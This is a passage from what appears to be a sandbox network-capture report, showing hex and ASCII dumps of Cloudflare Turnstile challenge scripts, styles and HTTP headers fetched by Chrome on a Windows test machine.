                                                                          2024-10-29 15:50:50 UTC1369INData Raw: 29 29 3b 76 61 72 20 50 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 2c 65 2e 4c 49 47 48 54 3d 22 6c 69 67 68 74 22 2c 65 2e 44 41 52 4b 3d 22 64 61 72 6b 22 7d 29 28 50 65 7c 7c 28 50 65 3d 7b 7d 29 29 3b 76 61 72 20 53 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 56 45 52 49 46 59 49 4e 47 3d 22 76 65 72 69 66 79 69 6e 67 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 76 65 72 69 66 79 69 6e 67 2d 68 61 76 69 6e 67 2d 74 72 6f 75 62 6c 65 73 22 2c 65 2e 46 41 49 4c 55 52 45 5f 57 4f 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 66 61 69 6c 75 72 65 2d 77 6f 2d 68 61 76 69 6e 67 2d 74 72 6f 75 62 6c 65 73 22 2c 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e
                                                                          Data Ascii: ));var Pe;(function(e){e.AUTO="auto",e.LIGHT="light",e.DARK="dark"})(Pe||(Pe={}));var Se;(function(e){e.VERIFYING="verifying",e.VERIFYING_HAVING_TROUBLES="verifying-having-troubles",e.FAILURE_WO_HAVING_TROUBLES="failure-wo-having-troubles",e.FAILURE_HAVIN
                                                                          2024-10-29 15:50:50 UTC1369INData Raw: 53 5f 4c 4f 4f 50 49 4e 47 3d 22 6b 65 65 70 73 2d 6c 6f 6f 70 69 6e 67 22 2c 65 2e 54 4f 4f 5f 53 4c 4f 57 3d 22 74 6f 6f 2d 73 6c 6f 77 22 2c 65 2e 4f 54 48 45 52 3d 22 6f 74 68 65 72 22 7d 29 28 61 74 7c 7c 28 61 74 3d 7b 7d 29 29 3b 66 75 6e 63 74 69 6f 6e 20 4c 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 65 2e 69 6e 64 65 78 4f 66 28 72 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 69 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 22 61 75 74 6f 22 2c 22 64 61 72 6b 22 2c 22 6c 69 67 68 74 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 22 61 75 74 6f 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 63 74 28 65 29 7b 72 65 74 75 72 6e 20 65 3e 30 26 26 65 3c 39 65 35 7d 66 75 6e 63 74 69 6f
                                                                          Data Ascii: S_LOOPING="keeps-looping",e.TOO_SLOW="too-slow",e.OTHER="other"})(at||(at={}));function L(e,r){return e.indexOf(r)!==-1}function it(e){return L(["auto","dark","light"],e)}function ot(e){return L(["auto","never"],e)}function ct(e){return e>0&&e<9e5}functio
                                                                          2024-10-29 15:50:50 UTC1369INData Raw: 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 22 2c 4a 74 3d 22 2e 63 66 2d 74 75 72 6e 73 74 69 6c 65 22 2c 5a 74 3d 22 2e 63 66 2d 63 68 61 6c 6c 65 6e 67 65 22 2c 65 72 3d 22 2e 67 2d 72 65 63 61 70 74 63 68 61 22 2c 79 74 3d 22 63 66 5f 63 68 61 6c 6c 65 6e 67 65 5f 72 65 73 70 6f 6e 73 65 22 2c 5f 74 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 22 2c 62 74 3d 22 67 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 22 2c 74 72 3d 38 65 33 2c 45 74 3d 22 70 72 69 76 61 74 65 2d 74 6f 6b 65 6e 22 2c 72 72 3d 33 2c 6e 72 3d 35 30 30 2c 61 72 3d 35 30 30 2c 59 3d 22 30 2f 30 22 3b 76 61 72 20 4e 72 3d 5b 22 62 67 2d 62 67 22 2c 22 64 61 2d 64 6b 22 2c 22 64 65 2d 64 65 22 2c 22 65 6c 2d 67 72 22 2c 22 6a 61 2d 6a 70 22 2c 22 6d 73
                                                                          Data Ascii: are-challenge",Jt=".cf-turnstile",Zt=".cf-challenge",er=".g-recaptcha",yt="cf_challenge_response",_t="cf-turnstile-response",bt="g-recaptcha-response",tr=8e3,Et="private-token",rr=3,nr=500,ar=500,Y="0/0";var Nr=["bg-bg","da-dk","de-de","el-gr","ja-jp","ms
                                                                          2024-10-29 15:50:50 UTC1369INData Raw: 22 34 38 30 70 78 22 3a 68 3f 22 35 38 30 70 78 22 3a 22 35 37 30 70 78 22 7d 2c 4c 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 65 2e 69 73 56 65 72 62 6f 73 65 4c 61 6e 67 75 61 67 65 2c 6e 3d 65 2e 69 73 53 6d 61 6c 6c 65 72 46 65 65 64 62 61 63 6b 2c 6f 3d 65 2e 69 73 4d 6f 64 65 72 61 74 65 6c 79 56 65 72 62 6f 73 65 3b 72 65 74 75 72 6e 20 6e 26 26 72 3f 22 35 34 30 70 78 22 3a 6e 26 26 6f 3f 22 35 30 30 70 78 22 3a 6e 3f 22 34 38 30 70 78 22 3a 72 3f 22 36 35 30 70 78 22 3a 6f 3f 22 35 39 30 70 78 22 3a 22 35 37 30 70 78 22 7d 3b 66 75 6e 63 74 69 6f 6e 20 48 65 28 65 29 7b 69 66 28 65 3d 3d 3d 76 6f 69 64 20 30 29 74 68 72 6f 77 20 6e 65 77 20 52 65 66 65 72 65 6e 63 65 45 72 72 6f 72 28 22 74 68 69 73 20 68 61 73 6e 27 74 20 62 65
                                                                          Data Ascii: "480px":h?"580px":"570px"},Lr=function(e){var r=e.isVerboseLanguage,n=e.isSmallerFeedback,o=e.isModeratelyVerbose;return n&&r?"540px":n&&o?"500px":n?"480px":r?"650px":o?"590px":"570px"};function He(e){if(e===void 0)throw new ReferenceError("this hasn't be
                                                                          2024-10-29 15:50:50 UTC1369INData Raw: 6e 63 74 69 6f 6e 20 6a 65 28 65 29 7b 76 61 72 20 72 3d 74 79 70 65 6f 66 20 4d 61 70 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 6e 65 77 20 4d 61 70 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 6a 65 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 69 66 28 6f 3d 3d 3d 6e 75 6c 6c 7c 7c 21 63 72 28 6f 29 29 72 65 74 75 72 6e 20 6f 3b 69 66 28 74 79 70 65 6f 66 20 6f 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 69 66 28 74 79 70 65 6f 66 20 72 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 7b 69 66 28 72 2e 68 61 73 28 6f 29 29 72 65 74 75 72 6e 20 72 2e 67 65
                                                                          Data Ascii: nction je(e){var r=typeof Map=="function"?new Map:void 0;return je=function(o){if(o===null||!cr(o))return o;if(typeof o!="function")throw new TypeError("Super expression must either be null or a function");if(typeof r!="undefined"){if(r.has(o))return r.ge
                                                                          2024-10-29 15:50:50 UTC1369INData Raw: 2e 74 65 73 74 28 63 2e 73 72 63 29 29 72 65 74 75 72 6e 20 63 7d 66 75 6e 63 74 69 6f 6e 20 64 72 28 29 7b 76 61 72 20 65 3d 52 74 28 29 3b 65 7c 7c 67 28 22 43 6f 75 6c 64 20 6e 6f 74 20 66 69 6e 64 20 54 75 72 6e 73 74 69 6c 65 20 73 63 72 69 70 74 20 74 61 67 2c 20 73 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6d 61 79 20 6e 6f 74 20 62 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 34 33 37 37 37 29 3b 76 61 72 20 72 3d 65 2e 73 72 63 2c 6e 3d 7b 6c 6f 61 64 65 64 41 73 79 6e 63 3a 21 31 2c 70 61 72 61 6d 73 3a 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 2c 73 72 63 3a 72 7d 3b 28 65 2e 61 73 79 6e 63 7c 7c 65 2e 64 65 66 65 72 29 26 26 28 6e 2e 6c 6f 61 64 65 64 41 73 79 6e 63 3d 21 30 29 3b 76 61 72 20 6f 3d 72 2e 73 70 6c 69 74 28 22 3f 22 29 3b
                                                                          Data Ascii: .test(c.src))return c}function dr(){var e=Rt();e||g("Could not find Turnstile script tag, some features may not be available",43777);var r=e.src,n={loadedAsync:!1,params:new URLSearchParams,src:r};(e.async||e.defer)&&(n.loadedAsync=!0);var o=r.split("?");
                                                                          2024-10-29 15:50:50 UTC1369INData Raw: 61 74 69 76 65 22 2c 73 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 37 22 2c 73 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 2c 73 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 52 61 64 69 75 73 3d 22 35 70 78 22 2c 73 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 70 78 22 2c 73 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 70 78 22 2c 73 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 3d 22 68 69 64 64 65 6e 22 2c 73 2e 73 74 79 6c 65 2e 6d 61 72 67 69 6e 3d 22 30 70 78 20 61 75 74 6f 22 3b 76 61 72 20 77 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 66 72 61 6d 65 22 29 3b 77 2e 69 64 3d 65 2b 22 2d 66 72 22 2c 77 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72
                                                                          Data Ascii: ative",s.style.zIndex="2147483647",s.style.backgroundColor="#ffffff",s.style.borderRadius="5px",s.style.left="0px",s.style.top="0px",s.style.overflow="hidden",s.style.margin="0px auto";var w=document.createElement("iframe");w.id=e+"-fr",w.setAttribute("sr


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          9192.168.2.1649715104.18.95.414436672C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-29 15:50:50 UTC845OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/s78r3/0x4AAAAAAAhNeI7hVTjvzoX5/auto/fbE/normal/auto/ HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: navigate
                                                                          Sec-Fetch-Dest: iframe
                                                                          Referer: https://ax3si7hub1rr.objectstorage.ap-singapore-2.oci.customer-oci.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-29 15:50:50 UTC1368INHTTP/1.1 200 OK
                                                                          Date: Tue, 29 Oct 2024 15:50:50 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 26538
                                                                          Connection: close
                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          cross-origin-opener-policy: same-origin
                                                                          origin-agent-cluster: ?1
                                                                          permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                          content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self'
                                                                          cross-origin-resource-policy: cross-origin
                                                                          document-policy: js-profiling
                                                                          referrer-policy: same-origin
                                                                          accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                          cross-origin-embedder-policy: require-corp
                                                                          critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                          2024-10-29 15:50:50 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 61 34 35 32 64 35 66 38 31 31 36 62 62 63 2d 44 46 57 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                          Data Ascii: Server: cloudflareCF-RAY: 8da452d5f8116bbc-DFWalt-svc: h3=":443"; ma=86400
                                                                          2024-10-29 15:50:50 UTC1288INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                          Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                          2024-10-29 15:50:50 UTC1369INData Raw: 64 65 6e 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69
                                                                          Data Ascii: den;padding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:anti
                                                                          2024-10-29 15:50:50 UTC1369INData Raw: 20 6c 69 6e 65 7b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b
                                                                          Data Ascii: line{stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;
                                                                          2024-10-29 15:50:50 UTC1369INData Raw: 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c
                                                                          Data Ascii: #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark #chal
                                                                          2024-10-29 15:50:50 UTC1369INData Raw: 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c
                                                                          Data Ascii: me-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-helper-l
                                                                          2024-10-29 15:50:50 UTC1369INData Raw: 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 75 6f 34 73 36 66 64 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 7d 74 6f 7b 66 69
                                                                          Data Ascii: -dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.uo4s6fd{0%{fill:#de1303;stroke:#de1303}to{fi
                                                                          2024-10-29 15:50:50 UTC1369INData Raw: 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 6c 6f 67 6f 7b
                                                                          Data Ascii: x-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-compact #logo{
                                                                          2024-10-29 15:50:50 UTC1369INData Raw: 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65 78 2d 73 74 61 72 74 3b 6a 75 73
                                                                          Data Ascii: x}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:flex-start;jus
                                                                          2024-10-29 15:50:50 UTC1369INData Raw: 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 33 70 78 3b 73 74 72 6f 6b 65
                                                                          Data Ascii: 9;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width:3px;stroke


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          10192.168.2.1649718104.18.95.414436672C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-29 15:50:51 UTC730OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8da452d5f8116bbc&lang=auto HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/s78r3/0x4AAAAAAAhNeI7hVTjvzoX5/auto/fbE/normal/auto/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-29 15:50:51 UTC331INHTTP/1.1 200 OK
                                                                          Date: Tue, 29 Oct 2024 15:50:51 GMT
                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                          Content-Length: 123316
                                                                          Connection: close
                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          Server: cloudflare
                                                                          CF-RAY: 8da452db2dfd4671-DFW
                                                                          alt-svc: h3=":443"; ma=86400
